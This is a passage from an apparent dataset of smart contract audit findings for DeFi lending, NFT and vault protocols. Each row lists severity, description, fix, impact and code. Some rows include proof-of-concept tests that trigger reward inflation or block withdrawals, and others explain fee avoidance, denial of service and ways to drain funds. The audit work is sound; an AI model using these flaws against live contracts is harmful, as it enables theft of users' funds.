lock into the rewards calculation, so that full multiplier is given only to a lock that is as old as the stake itself.",A staker can get larger rewards designed for locked stakes by locking and unlocking in the same tx.,"```\\n it(""PoC: staker with locked balance gets more rewards even when just locked"", async () => {\\n const trustAmount = parseUnits(""2000"");\\n const borrowAmount = parseUnits(""1800"");\\n const [account, staker, borrower] = members;\\n\\n const [accountStaked, borrowerStaked, stakerStaked] = await helpers.getStakedAmounts(\\n account,\\n staker,\\n borrower\\n );\\n\\n expect(accountStaked).eq(borrowerStaked);\\n expect(borrowerStaked).eq(stakerStaked);\\n\\n await helpers.updateTrust(staker, borrower, trustAmount);\\n \\n await roll(10);\\n await helpers.borrow(borrower, borrowAmount); // borrows just after withdrawing\\n \\n const [accountMultiplier, stakerMultiplier] = await helpers.getRewardsMultipliers(account, staker);\\n console.log(""accountMultiplier: "", accountMultiplier);\\n console.log(""StakerMultiplier: "", stakerMultiplier);\\n expect(accountMultiplier).lt(stakerMultiplier); // the multiplier is larger even if just locked\\n });\\n```\\n" +updateTrust() vouchers also need check maxVouchers,medium,"maxVouchers is to prevent the “vouchees“ array from getting too big and the loop will have the GAS explosion problem, but “vouchers“have the same problem, if you don't check the vouchers array, it is also possible that vouchers are big and cause updateLocked() to fail\\nvouchees check < maxVouchers ,but vouchers don't check\\n```\\n function updateTrust(address borrower, uint96 trustAmount) external onlyMember(msg.sender) whenNotPaused {\\n// rest of code\\n uint256 voucheesLength = vouchees[staker].length;\\n if (voucheesLength >= maxVouchers) revert MaxVouchees();\\n\\n\\n uint256 voucherIndex = vouchers[borrower].length;\\n voucherIndexes[borrower][staker] = Index(true, uint128(voucherIndex));\\n 
vouchers[borrower].push(Vouch(staker, trustAmount, 0, 0)); /**** don't check maxVouchers****/\\n```\\n","```\\n function updateTrust(address borrower, uint96 trustAmount) external onlyMember(msg.sender) whenNotPaused {\\n// rest of code\\n uint256 voucheesLength = vouchees[staker].length;\\n if (voucheesLength >= maxVouchers) revert MaxVouchees();\\n\\n\\n uint256 voucherIndex = vouchers[borrower].length;\\n+ if (voucherIndex >= maxVouchers) revert MaxVouchees();\\n voucherIndexes[borrower][staker] = Index(true, uint128(voucherIndex));\\n vouchers[borrower].push(Vouch(staker, trustAmount, 0, 0)); \\n```\\n",it is also possible that vouchers are big and cause updateLocked() to fail,"```\\n function updateTrust(address borrower, uint96 trustAmount) external onlyMember(msg.sender) whenNotPaused {\\n// rest of code\\n uint256 voucheesLength = vouchees[staker].length;\\n if (voucheesLength >= maxVouchers) revert MaxVouchees();\\n\\n\\n uint256 voucherIndex = vouchers[borrower].length;\\n voucherIndexes[borrower][staker] = Index(true, uint128(voucherIndex));\\n vouchers[borrower].push(Vouch(staker, trustAmount, 0, 0)); /**** don't check maxVouchers****/\\n```\\n" +Unsafe downcasting arithmetic operation in UserManager related contract and in UToken.sol,medium,"The value is unsafely downcasted and truncated from uint256 to uint96 or uint128 in UserManager related contract and in UToken.sol.\\nvalue can unsafely downcasted. 
let us look at it cast by cast.\\nIn UserManagerDAI.sol\\n```\\n function stakeWithPermit(\\n uint256 amount,\\n uint256 nonce,\\n uint256 expiry,\\n uint8 v,\\n bytes32 r,\\n bytes32 s\\n ) external whenNotPaused {\\n IDai erc20Token = IDai(stakingToken);\\n erc20Token.permit(msg.sender, address(this), nonce, expiry, true, v, r, s);\\n\\n stake(uint96(amount));\\n }\\n```\\n\\nas we can see, the user's staking amount is downcasted from uint256 to uint96.\\nthe same issue exists in UserManagerERC20.sol\\nIn the context of UToken.sol, a bigger issue comes.\\nUser invokes the borrow function in UToken.sol\\n```\\n function borrow(address to, uint256 amount) external override onlyMember(msg.sender) whenNotPaused nonReentrant {\\n```\\n\\nand\\n```\\n // Withdraw the borrowed amount of tokens from the assetManager and send them to the borrower\\n if (!assetManagerContract.withdraw(underlying, to, amount)) revert WithdrawFailed();\\n\\n // Call update locked on the userManager to lock this borrowers stakers. This function\\n // will revert if the account does not have enough vouchers to cover the borrow amount. ie\\n // the borrower is trying to borrow more than is able to be underwritten\\n IUserManager(userManager).updateLocked(msg.sender, uint96(amount + fee), true);\\n```\\n\\nnote when we withdraw fund from asset Manager, we use a uint256 amount, but we downcast it to uint96(amount + fee) when updating the locked. 
The accounting would be so broken if the amount + fee is a larger than uint96 number.\\nSame issue in the function UToken.sol# _repayBorrowFresh\\n```\\n function _repayBorrowFresh(\\n address payer,\\n address borrower,\\n uint256 amount\\n ) internal {\\n```\\n\\nand\\n```\\n // Update the account borrows to reflect the repayment\\n accountBorrows[borrower].principal = borrowedAmount - repayAmount;\\n accountBorrows[borrower].interest = 0;\\n```\\n\\nand\\n```\\n IUserManager(userManager).updateLocked(borrower, uint96(repayAmount - interest), false);\\n```\\n\\nwe use a uint256 number for borrowedAmount - repayAmount, but downcast it to uint96(repayAmount - interest) when updating the lock!\\nNote there are index-related downcasting, the damage is small , comparing the accounting related downcasting.because it is difference to have uint128 amount of vouch, but I still want to mention it: the index is unsafely downcasted from uint256 to uint128\\n```\\n // Get the new index that this vouch is going to be inserted at\\n // Then update the voucher indexes for this borrower as well as\\n // Adding the Vouch the the vouchers array for this staker\\n uint256 voucherIndex = vouchers[borrower].length;\\n voucherIndexes[borrower][staker] = Index(true, uint128(voucherIndex));\\n vouchers[borrower].push(Vouch(staker, trustAmount, 0, 0));\\n\\n // Add the voucherIndex of this new vouch to the vouchees array for this\\n // staker then update the voucheeIndexes with the voucheeIndex\\n uint256 voucheeIndex = voucheesLength;\\n vouchees[staker].push(Vouchee(borrower, uint96(voucherIndex)));\\n voucheeIndexes[borrower][staker] = Index(true, uint128(voucheeIndex));\\n```\\n\\nThere are block.number related downcasting, which is a smaller issue.\\n```\\nvouch.lastUpdated = uint64(block.number);\\n```\\n","Just use uint256, or use openzepplin safeCasting.",The damage level from the number truncation is rated by:\\nUToken borrow and repaying downcasting > staking amount downcating 
truncation > the vouch index related downcasting. > block.number casting.,"```\\n function stakeWithPermit(\\n uint256 amount,\\n uint256 nonce,\\n uint256 expiry,\\n uint8 v,\\n bytes32 r,\\n bytes32 s\\n ) external whenNotPaused {\\n IDai erc20Token = IDai(stakingToken);\\n erc20Token.permit(msg.sender, address(this), nonce, expiry, true, v, r, s);\\n\\n stake(uint96(amount));\\n }\\n```\\n" +getUserInfo() returns incorrect values for locked and stakedAmount,medium,"The `getUserInfo()` function mixes up the values for `locked` and `stakedAmount`, so the value for each of these is returned for the other.\\nIn UnionLens.sol, the `getUserInfo()` function is used to retrieve information about a given user.\\nIn order to pull the user's staking information, the following function is called:\\n```\\n(bool isMember, uint96 locked, uint96 stakedAmount) = userManager.stakers(user);\\n```\\n\\nThis function is intended to return these three values from the UserManager.sol contract. However, in that contract, the function being called returns a Staker struct, which has the following values:\\n```\\nstruct Staker {\\n bool isMember;\\n uint96 stakedAmount;\\n uint96 locked;\\n}\\n```\\n\\nBecause both `locked` and `stakedAmount` have the type `uint96`, the function does not revert, and simply returns the incorrect values to the caller.","Reverse the order of return values in the `getUserInfo()` function, so that it reads:\\n```\\n(bool isMember, uint96 stakedAmount, uint96 locked) = userManager.stakers(user);\\n```\\n","Any user or front end calling the `getUserInfo()` function will be given incorrect values, which could lead to wrong decisions.","```\\n(bool isMember, uint96 locked, uint96 stakedAmount) = userManager.stakers(user);\\n```\\n" +`AssetManager.rebalance()` will revert when the balance of `tokenAddress` in the money market is 0.,medium,"`AssetManager.rebalance()` will revert when the balance of `tokenAddress` in the money market is 0.\\nAssetManager.rebalance() 
tries to withdraw tokens from each money market for rebalancing here.\\n```\\n // Loop through each money market and withdraw all the tokens\\n for (uint256 i = 0; i < moneyMarketsLength; i++) {\\n IMoneyMarketAdapter moneyMarket = moneyMarkets[i];\\n if (!moneyMarket.supportsToken(tokenAddress)) continue;\\n moneyMarket.withdrawAll(tokenAddress, address(this));\\n\\n supportedMoneyMarkets[supportedMoneyMarketsSize] = moneyMarket;\\n supportedMoneyMarketsSize++;\\n }\\n```\\n\\nWhen the balance of the `tokenAddress` is 0, we don't need to call `moneyMarket.withdrawAll()` but it still tries to call.\\nBut this will revert because Aave V3 doesn't allow to withdraw 0 amount here.\\n```\\n function validateWithdraw(\\n DataTypes.ReserveCache memory reserveCache,\\n uint256 amount,\\n uint256 userBalance\\n ) internal pure {\\n require(amount != 0, Errors.INVALID_AMOUNT);\\n```\\n\\nSo `AssetManager.rebalance()` will revert if one money market has zero balance of `tokenAddress`.","Issue `AssetManager.rebalance()` will revert when the balance of `tokenAddress` in the money market is 0.\\nI think we can modify AaveV3Adapter.withdrawAll() to work only when the balance is positive.\\n```\\n function withdrawAll(address tokenAddress, address recipient)\\n external\\n override\\n onlyAssetManager\\n checkTokenSupported(tokenAddress)\\n {\\n address aTokenAddress = tokenToAToken[tokenAddress];\\n IERC20Upgradeable aToken = IERC20Upgradeable(aTokenAddress);\\n uint256 balance = aToken.balanceOf(address(this));\\n\\n if (balance > 0) {\\n lendingPool.withdraw(tokenAddress, type(uint256).max, recipient);\\n }\\n }\\n```\\n",The money markets can't be rebalanced if there is no balance in at least one market.,"```\\n // Loop through each money market and withdraw all the tokens\\n for (uint256 i = 0; i < moneyMarketsLength; i++) {\\n IMoneyMarketAdapter moneyMarket = moneyMarkets[i];\\n if (!moneyMarket.supportsToken(tokenAddress)) continue;\\n moneyMarket.withdrawAll(tokenAddress, 
address(this));\\n\\n supportedMoneyMarkets[supportedMoneyMarketsSize] = moneyMarket;\\n supportedMoneyMarketsSize++;\\n }\\n```\\n" +gas limit DoS via unbounded operations,medium,"Only one attack will lead to two types of vulnerabilities in `UserManager.sol` and `UToken.sol`\\nOn `UserManager.sol` ==> `updateTrust()` Case one: malicious users (members) can keep `vouching` Alice with `trustAmount == 0` until his `vouchers` array achieves the max limit (2**256-1) So when a normal member tries to give `vouching` to Alice with `trustAmount != 0` he will find because the `vouchers` array completely full.\\nCase two (which is more realistic ): malicious users (members) can keep `vouching` Alice with `trustAmount == 0` until his `vouchers` array achieves late's say 20% of max limit (2**256-1) The problem is when Alice invoke `borrow()` or `repayBorrow()` on `UToken.sol`\\n```\\n IUserManager(userManager).updateLocked(msg.sender, uint96(amount + fee), true);\\n …\\n IUserManager(userManager).updateLocked(borrower, uint96(repayAmount - interest), false);\\n```\\n\\nIt will call `updateLocked()` on `UserManager.sol`\\n```\\n function updateLocked(\\n address borrower,\\n uint96 amount,\\n bool lock\\n ) external onlyMarket {\\n uint96 remaining = amount;\\n\\n for (uint256 i = 0; i < vouchers[borrower].length; i++) {\\n \\n```\\n\\nThe for loop could go through `vouchers[]` which could be long enough to lead to a ""gas limit DoS via unbounded operations"" And the same thing with `registerMember()`, any user could lose all their fund in this transaction\\n```\\n function registerMember(address newMember) public virtual whenNotPaused {\\n if (stakers[newMember].isMember) revert NoExistingMember();\\n\\n uint256 count = 0;\\n uint256 vouchersLength = vouchers[newMember].length;\\n\\n // Loop through all the vouchers to count how many active vouches there\\n // are that are greater than 0. 
Vouch is the min of stake and trust\\n for (uint256 i = 0; i < vouchersLength; i++) {\\n```\\n",Add check for `trustAmount == 0`,1- The user couldn't get any more `vouching` 2- The user will be not able to `borrow()` or `repayBorrow()` 3- No one can in invokeregisterMember() successfully for a specific user,"```\\n IUserManager(userManager).updateLocked(msg.sender, uint96(amount + fee), true);\\n …\\n IUserManager(userManager).updateLocked(borrower, uint96(repayAmount - interest), false);\\n```\\n" +Template implementations doesn't validate configurations properly,medium,"In past audits, we have seen contract admins claim that invalidated configuration setters are fine since “admins are trustworthy”. However, cases such as Nomad got drained for over $150M and Misconfiguration in the Acala stablecoin project allows attacker to steal 1.2 billion aUSD have shown again and again that even trustable entities can make mistakes. Thus any fields that might potentially result in insolvency of protocol should be thoroughly checked.\\nNftPort template implementations often ignore checks for config fields. For the rest of the issue, we take `royalty` related fields as an example to illustrate potential consequences of misconfigurations. Notably, lack of check is not limited to `royalty`, but exists among most config fields.\\nAdmins are allowed to set a wrong `royaltiesBps` which is higher than `ROYALTIES_BASIS`. `royaltyInfo()` will accept this invalid `royaltiesBps` and users will pay a large amount of royalty.\\nEIP-2981 (NFT Royalty Standard) defines `royaltyInfo()` function that specifies how much to pay for a given sale price. In general, royalty should not be higher than 100%. 
NFTCollection.sol checks that admins can't set royalties to more than 100%:\\n```\\n /// Validate a runtime configuration change\\n function _validateRuntimeConfig(RuntimeConfig calldata config)\\n internal\\n view\\n {\\n // Can't set royalties to more than 100%\\n require(config.royaltiesBps <= ROYALTIES_BASIS, ""Royalties too high"");\\n\\n // rest of code\\n```\\n\\nBut `NFTCollection` only check `royaltiesBps` when admins call `updateConfig()`, it doesn't check `royaltiesBps` in `initialize()` function, leading to admins could set an invalid `royaltiesBps` (higher than 100%) when initializing contracts.\\nThe same problem exists in ERC721NFTProduct and ERC1155NFTProduct. Both ERC721NFTProduct and ERC1155NFTProduct don't check `royaltiesBasisPoints` in `initialize()` function. Furthermore, these contracts also don't check `royaltiesBasisPoints` when admins call `update()` function. It means that admins could set an invalid `royaltiesBasisPoints` which may be higher than 100% in any time.",Issue Template implementations doesn't validate configurations properly\\nCheck `royaltiesBps <= ROYALTIES_BASIS` both in `initialize()` and `update()` functions.,"EIP-2981 only defines `royaltyInfo()` that it should return royalty amount rather than royalty percentage. It means that if the contract has an invalid royalty percentage which is higher than 100%, `royaltyInfo()` doesn't revert and users will pay a large amount of royalty.","```\\n /// Validate a runtime configuration change\\n function _validateRuntimeConfig(RuntimeConfig calldata config)\\n internal\\n view\\n {\\n // Can't set royalties to more than 100%\\n require(config.royaltiesBps <= ROYALTIES_BASIS, ""Royalties too high"");\\n\\n // rest of code\\n```\\n" +Freezing roles in ERC721NFTProduct and ERC1155NFTProduct is moot,medium,"In ERC721NFTProduct and ERC1155NFTProduct roles can be frozen which is supposed to lock role to current addresses and not allow any changes. 
The problem is that admin can still use AccessControlUpgradable#grantRole and revokeRole to grant and remove roles to addresses because hasRole allows ""ADMIN_ROLE"" to bypass all role restrictions even ""DEFAULT_ADMIN_ROLE"".\\n```\\nfunction hasRole(bytes32 role, address account)\\n public\\n view\\n virtual\\n override\\n returns (bool)\\n{\\n return\\n super.hasRole(ADMIN_ROLE, account) || super.hasRole(role, account);\\n}\\n```\\n\\nIn GranularRoles.sol and AccessControlUpgradable.sol, developers are careful to never grant the ""DEFAULT_ADMIN_ROLE"" to any user. Additionally they never set the admin role of any role so that it's admin will remain ""DEFAULT_ADMIN_ROLE"". In theory this should make so that there is no way to grant or revoke roles outside of GranularRoles#_initRoles and updateRoles. The issue is that the override by GranularRoles#hasRole allows ""ADMIN_ROLE"" to bypass any role restriction including ""DEFAULT_ADMIN_ROLE"". This allows ""ADMIN_ROLE"" to directly call AccessControlUpgradable#grantRole and revokeRole, which makes the entire freezing system useless as it doesn't actually stop any role modification.","Override AccessControlUpgradable#grantRole and revokeRole in GranularRoles.sol to revert when called:\\n```\\n GranularRoles.sol\\n\\n+ function grantRole(bytes32 role, address account) public virtual override {\\n+ revert();\\n+ }\\n\\n+ function revokeRole(bytes32 role, address account) public virtual override {\\n+ revert();\\n+ }\\n```\\n","Freezing roles doesn't actually prevent ""ADMIN_ROLE"" from modifying roles as intended. 
Submitting as high due to gross over-extension of admin authority clearly violating intended guardrails.","```\\nfunction hasRole(bytes32 role, address account)\\n public\\n view\\n virtual\\n override\\n returns (bool)\\n{\\n return\\n super.hasRole(ADMIN_ROLE, account) || super.hasRole(role, account);\\n}\\n```\\n" +registerTemplate() can't handle properly when ITemplate version is 0,medium,"Factory.sol when register one template , and template ' s version is 0, the latestImplementation[templateName] will be address(0) and add other version, ""_templateNames"" will duplicate\\nWhen version is equal 0 latestImplementation[templateName] don't set\\n```\\n function _setTemplate(\\n string memory templateName,\\n uint256 templateVersion,\\n address implementationAddress\\n ) internal {\\n// rest of code\\n\\n if (latestImplementation[templateName] == address(0)) { /****add other version, _templateNames will duplicate ****/\\n _templateNames.push(templateName);\\n }\\n\\n if (templateVersion > latestVersion[templateName]) {\\n latestVersion[templateName] = templateVersion;\\n latestImplementation[templateName] = implementationAddress; /****templateVersion==0 , don't set ****/\\n }\\n\\n }\\n```\\n","```\\n function _setTemplate(\\n string memory templateName,\\n uint256 templateVersion,\\n address implementationAddress\\n ) internal {\\n\\n - if (templateVersion > latestVersion[templateName]) {\\n + if (templateVersion > = latestVersion[templateName]) {\\n latestVersion[templateName] = templateVersion;\\n latestImplementation[templateName] = implementationAddress; \\n }\\n```\\n","latestImplementation[templateName] and _templateNames will error. 
external contracts may think there is no setup, resulting in duplicate setups that keep failing","```\\n function _setTemplate(\\n string memory templateName,\\n uint256 templateVersion,\\n address implementationAddress\\n ) internal {\\n// rest of code\\n\\n if (latestImplementation[templateName] == address(0)) { /****add other version, _templateNames will duplicate ****/\\n _templateNames.push(templateName);\\n }\\n\\n if (templateVersion > latestVersion[templateName]) {\\n latestVersion[templateName] = templateVersion;\\n latestImplementation[templateName] = implementationAddress; /****templateVersion==0 , don't set ****/\\n }\\n\\n }\\n```\\n" +Factory uses signature that do not have expiration,medium,"NftPort can't remove license from user, once the signature was provided to it, without changing `SIGNER_ROLE` address.\\nIn Factory contract there are few methods that are called when signed by trusted signer.\\nThis is how the signature is checked\\n```\\nsignedOnly(abi.encodePacked(msg.sender, instance, data), signature)\\n```\\n\\nAs you can see there is no any expiration time. That means that once, the signer has signed the signature for the user it can use it for the end of life. It's like lifetime license. The only option to remove the license from user is to revoke `SIGNER_ROLE` and set it to another account. But it's possible that the NFTPort will have a need to do that with current signer.",Add expiration param to the signature.,License can't be removed.,"```\\nsignedOnly(abi.encodePacked(msg.sender, instance, data), signature)\\n```\\n" +Underflow in ```_previewWithdraw``` could prevent withdrawals,high,"An underflow in the `_previewWithdraw` function in `AuctionInternal.sol` due to totalContractsSold exceeding auction.totalContracts could prevent users from withdrawing options.\\nThe `_previewWithdraw` function returns the fill and refund amounts for a buyer by looping over all orders. 
A totalContractsSold variable is used to track the amount of contracts sold as the loop iterates over all orders. If the current order's size + totalContractsSold exceeds the auction's totalContracts then the order will only be filled partially. The calculation for the partial fill (remainder) is given on line 318. This will lead to an underflow if totalContractsSold > the auction's totalContracts which would happen if there are multiple orders that cause the totalContractsSold variable to exceed totalContracts.\\nThe totalContractsSold variable in `_previewWithdraw` could exceed the auction.totalContracts due to the contracts sold before the start of an auction through limit orders not being limited. When an order is added, `_finalizeAuction` is only called if the auction has started. The `_finalizeAuction` function will call the `_processOrders` function which will return true if the auction has reached 100% utilization. Since limit orders can be made before the start of an auction, `_finalizeAuction` is not called and any amount of new orders may be made.\\nExample: The buyer makes a limit order with size > auction.totalContracts. They then make another order with size of anything. These orders are made before the start of the auction so `_processOrders` is not called for every new order and totalContractsSold can exceed totalContracts. When `_previewWithdraw` is called, after the buyer's first order is processed, totalContractsSold > auction.totalContracts so the condition on line 313 passes. Since totalContractsSold > auction.totalContracts the calculation on line 318 underflows and the transaction reverts. 
The `_previewWithdraw` function and thus the `_withdraw` function is uncallable.\\nTest code added to `Auction.behaviour.ts`, under the `#addLimitOrder(uint64,int128,uint256)` section:\\n```\\n it(""previewWithdraw reverts if buyer has too many contracts"", async () => {\\n assert.isEmpty(await auction.getEpochsByBuyer(addresses.buyer1));\\n\\n await asset\\n .connect(signers.buyer1)\\n .approve(addresses.auction, ethers.constants.MaxUint256);\\n\\n const totalContracts = await auction.getTotalContracts(epoch);\\n await auction.addLimitOrder(\\n epoch,\\n fixedFromFloat(params.price.max),\\n totalContracts.mul(2)\\n );\\n\\n await auction.addLimitOrder(\\n epoch,\\n fixedFromFloat(params.price.max),\\n totalContracts.div(2)\\n );\\n\\n const epochByBuyer = await auction.getEpochsByBuyer(addresses.buyer1);\\n\\n assert.equal(epochByBuyer.length, 1);\\n assert.bnEqual(epochByBuyer[0], epoch);\\n \\n await expect(auction.callStatic[\\n ""previewWithdraw(uint64)""\\n ](epoch)).to.be.reverted;\\n });\\n```\\n\\nThe test code above shows a buyer is able to add an order with size auction.totalContracts*2 and a subsequent order with size auction.totalContracts/2. The `previewWithdraw` function reverts when called.","The loop in `_previewWithdraw` should check if the current totalContractsSold is >= totalContracts. If it is then the remainder should be set to 0 which would allow the current order to be fully refunded.\\nAdditionally, the orders for an auction should be checked before the auction starts. In `_addOrder`, consider adding a condition that will call `_processOrders` if the auction has not started yet. If `_processOrders` returns true then do not allow the order to be added. 
Or just allow the auction to be finalized before it starts if the total contracts sold has reached the auction's totalContracts.",Users would be unable to withdraw from the Auction contract.,"```\\n it(""previewWithdraw reverts if buyer has too many contracts"", async () => {\\n assert.isEmpty(await auction.getEpochsByBuyer(addresses.buyer1));\\n\\n await asset\\n .connect(signers.buyer1)\\n .approve(addresses.auction, ethers.constants.MaxUint256);\\n\\n const totalContracts = await auction.getTotalContracts(epoch);\\n await auction.addLimitOrder(\\n epoch,\\n fixedFromFloat(params.price.max),\\n totalContracts.mul(2)\\n );\\n\\n await auction.addLimitOrder(\\n epoch,\\n fixedFromFloat(params.price.max),\\n totalContracts.div(2)\\n );\\n\\n const epochByBuyer = await auction.getEpochsByBuyer(addresses.buyer1);\\n\\n assert.equal(epochByBuyer.length, 1);\\n assert.bnEqual(epochByBuyer[0], epoch);\\n \\n await expect(auction.callStatic[\\n ""previewWithdraw(uint64)""\\n ](epoch)).to.be.reverted;\\n });\\n```\\n" +Users can avoid performance fees by withdrawing before the end of the epoch forcing other users to pay their fees,medium,"No performance fees are taken when user withdraws early from the vault but their withdrawal value will be used to take fees, which will be taken from other users.\\n```\\nuint256 adjustedTotalAssets = _totalAssets() + l.totalWithdrawals;\\n\\nif (adjustedTotalAssets > l.lastTotalAssets) {\\n netIncome = adjustedTotalAssets - l.lastTotalAssets;\\n\\n feeInCollateral = l.performanceFee64x64.mulu(netIncome);\\n\\n ERC20.safeTransfer(l.feeRecipient, feeInCollateral);\\n}\\n```\\n\\nWhen taking the performance fees, it factors in both the current assets of the vault as well as the total value of withdrawals that happened during the epoch. Fees are paid from the collateral tokens in the vault, at the end of the epoch. Paying the fees like this reduces the share price of all users, which effectively works as a fee applied to all users. 
The problem is that withdraws that take place during the epoch are not subject to this fee and the total value of all their withdrawals are added to the adjusted assets of the vault. This means that they don't pay any performance fee but the fee is still taken from the vault collateral. In effect they completely avoid the fee force all there other users of the vault to pay it for them.",Fees should be taken on withdrawals that occur before vault is settled,User can avoid performance fees and force other users to pay them,"```\\nuint256 adjustedTotalAssets = _totalAssets() + l.totalWithdrawals;\\n\\nif (adjustedTotalAssets > l.lastTotalAssets) {\\n netIncome = adjustedTotalAssets - l.lastTotalAssets;\\n\\n feeInCollateral = l.performanceFee64x64.mulu(netIncome);\\n\\n ERC20.safeTransfer(l.feeRecipient, feeInCollateral);\\n}\\n```\\n" +processAuction() in VaultAdmin.sol can be called multiple times by keeper if the auction is canceled.,medium,"processAuction() in VaultAdmin.sol can be called multiple times by keeper if the auction is canceled.\\nprocessAuction() in VaultAdmin.sol can be called multiple times by keeper, the code below would execute more than one times if the auction is canceled.\\nbecause it is the line of code inside the function processAuction in VaultAdmin.sol below that can change the auction status to PROCESSED.\\nthis code only runs when the auction is finalized, it not finalized, the auction is in Canceled State and\\n```\\n bool cancelled = l.Auction.isCancelled(lastEpoch);\\n bool finalized = l.Auction.isFinalized(lastEpoch);\\n\\n require(\\n (!finalized && cancelled) || (finalized && !cancelled),\\n ""auction is not finalized nor cancelled""\\n );\\n```\\n\\nwould always pass because the auction is in cancel state.",Issue processAuction() in VaultAdmin.sol can be called multiple times by keeper if the auction is canceled.\\nWe recommend the project lock the epoch and make it impossible for keeper to call the processAuction again.,"Why the 
processAuction should not be called multiple times?\\nIn the first time it is called, the withdrawal lock is released so user can withdraw fund,\\n```\\n // deactivates withdrawal lock\\n l.auctionProcessed = true;\\n```\\n\\nthen if we called again, the lastTotalAssets can be updated multiple times.\\n```\\n // stores the last total asset amount, this is effectively the amount of assets held\\n // in the vault at the start of the auction\\n l.lastTotalAssets = _totalAssets();\\n```\\n\\nthe total asset can be lower and lower because people are withdrawing their fund.\\nthen when _collectPerformanceFee is called, the performance may still be collected","```\\n bool cancelled = l.Auction.isCancelled(lastEpoch);\\n bool finalized = l.Auction.isFinalized(lastEpoch);\\n\\n require(\\n (!finalized && cancelled) || (finalized && !cancelled),\\n ""auction is not finalized nor cancelled""\\n );\\n```\\n" +`TradingUtils._executeTrade()` doesn't check `preTradeBalance` properly.,high,"`TradingUtils._executeTrade()` doesn't check `preTradeBalance` properly.\\n`TradingUtils._executeTrade()` doesn't check `preTradeBalance` properly.\\n```\\nfunction _executeTrade(\\n address target,\\n uint256 msgValue,\\n bytes memory params,\\n address spender,\\n Trade memory trade\\n) private {\\n uint256 preTradeBalance;\\n\\n if (trade.sellToken == address(Deployments.WETH) && spender == Deployments.ETH_ADDRESS) {\\n preTradeBalance = address(this).balance;\\n // Curve doesn't support Deployments.WETH (spender == address(0))\\n uint256 withdrawAmount = _isExactIn(trade) ? trade.amount : trade.limit;\\n Deployments.WETH.withdraw(withdrawAmount);\\n } else if (trade.sellToken == Deployments.ETH_ADDRESS && spender != Deployments.ETH_ADDRESS) {\\n preTradeBalance = IERC20(address(Deployments.WETH)).balanceOf(address(this));\\n // UniswapV3 doesn't support ETH (spender != address(0))\\n uint256 depositAmount = _isExactIn(trade) ? 
trade.amount : trade.limit;\\n Deployments.WETH.deposit{value: depositAmount }();\\n }\\n\\n (bool success, bytes memory returnData) = target.call{value: msgValue}(params);\\n if (!success) revert TradeExecution(returnData);\\n\\n if (trade.buyToken == address(Deployments.WETH)) {\\n if (address(this).balance > preTradeBalance) {\\n // If the caller specifies that they want to receive Deployments.WETH but we have received ETH,\\n // wrap the ETH to Deployments.WETH.\\n uint256 depositAmount;\\n unchecked { depositAmount = address(this).balance - preTradeBalance; }\\n Deployments.WETH.deposit{value: depositAmount}();\\n }\\n } else if (trade.buyToken == Deployments.ETH_ADDRESS) {\\n uint256 postTradeBalance = IERC20(address(Deployments.WETH)).balanceOf(address(this));\\n if (postTradeBalance > preTradeBalance) {\\n // If the caller specifies that they want to receive ETH but we have received Deployments.WETH,\\n // unwrap the Deployments.WETH to ETH.\\n uint256 withdrawAmount;\\n unchecked { withdrawAmount = postTradeBalance - preTradeBalance; }\\n Deployments.WETH.withdraw(withdrawAmount);\\n }\\n }\\n}\\n```\\n\\nIt uses `preTradeBalance` to manage the WETH/ETH deposits and withdrawals.\\nBut it doesn't save the correct `preTradeBalance` for some cases.\\nLet's assume `trade.sellToken = some ERC20 token(not WETH/ETH), trade.buyToken = WETH`\\nBefore executing the trade, `preTradeBalance` will be 0 as both `if` conditions are false.\\nThen all ETH inside the contract will be converted to WETH and considered as a `amountBought` here and here.\\nAfter all, all ETH of the contract will be lost.\\nAll WETH of the contract will be lost also when `trade.sellToken = some ERC20 token(not WETH/ETH), trade.buyToken = ETH` here.",We should check `preTradeBalance` properly. 
We can remove the current code for `preTradeBalance` and insert the below code before executing the trade.\\n```\\nif (trade.buyToken == address(Deployments.WETH)) {\\n preTradeBalance = address(this).balance;\\n} else if (trade.buyToken == Deployments.ETH_ADDRESS) {\\n preTradeBalance = IERC20(address(Deployments.WETH)).balanceOf(address(this));\\n}\\n```\\n,All of ETH/WETH balance of the contract might be lost in some cases.,"```\\nfunction _executeTrade(\\n address target,\\n uint256 msgValue,\\n bytes memory params,\\n address spender,\\n Trade memory trade\\n) private {\\n uint256 preTradeBalance;\\n\\n if (trade.sellToken == address(Deployments.WETH) && spender == Deployments.ETH_ADDRESS) {\\n preTradeBalance = address(this).balance;\\n // Curve doesn't support Deployments.WETH (spender == address(0))\\n uint256 withdrawAmount = _isExactIn(trade) ? trade.amount : trade.limit;\\n Deployments.WETH.withdraw(withdrawAmount);\\n } else if (trade.sellToken == Deployments.ETH_ADDRESS && spender != Deployments.ETH_ADDRESS) {\\n preTradeBalance = IERC20(address(Deployments.WETH)).balanceOf(address(this));\\n // UniswapV3 doesn't support ETH (spender != address(0))\\n uint256 depositAmount = _isExactIn(trade) ? 
trade.amount : trade.limit;\\n Deployments.WETH.deposit{value: depositAmount }();\\n }\\n\\n (bool success, bytes memory returnData) = target.call{value: msgValue}(params);\\n if (!success) revert TradeExecution(returnData);\\n\\n if (trade.buyToken == address(Deployments.WETH)) {\\n if (address(this).balance > preTradeBalance) {\\n // If the caller specifies that they want to receive Deployments.WETH but we have received ETH,\\n // wrap the ETH to Deployments.WETH.\\n uint256 depositAmount;\\n unchecked { depositAmount = address(this).balance - preTradeBalance; }\\n Deployments.WETH.deposit{value: depositAmount}();\\n }\\n } else if (trade.buyToken == Deployments.ETH_ADDRESS) {\\n uint256 postTradeBalance = IERC20(address(Deployments.WETH)).balanceOf(address(this));\\n if (postTradeBalance > preTradeBalance) {\\n // If the caller specifies that they want to receive ETH but we have received Deployments.WETH,\\n // unwrap the Deployments.WETH to ETH.\\n uint256 withdrawAmount;\\n unchecked { withdrawAmount = postTradeBalance - preTradeBalance; }\\n Deployments.WETH.withdraw(withdrawAmount);\\n }\\n }\\n}\\n```\\n" +Bought/Purchased Token Can Be Sent To Attacker's Wallet Using 0x Adaptor,high,"The lack of recipient validation against the 0x order within the 0x adaptor (ZeroExAdapter) allows the purchased/output tokens of the trade to be sent to the attacker's wallet.\\nBackground\\nHow does the emergency vault settlement process work?\\nAnyone can call the `settleVaultEmergency` function to trigger the emergency vault settlement as it is permissionless\\nThe `_getEmergencySettlementParams` function will calculate the excess BPT tokens within the vault to be settled/sold\\nThe amount of excess BPT tokens will be converted to an equivalence amount of strategy tokens to be settled\\nThe strategy tokens will be settled by withdrawing staked BPT tokens from Aura Finance back to the vault for redemption.\\nThe vault will then redeem the BTP tokens from Balancer to redeem 
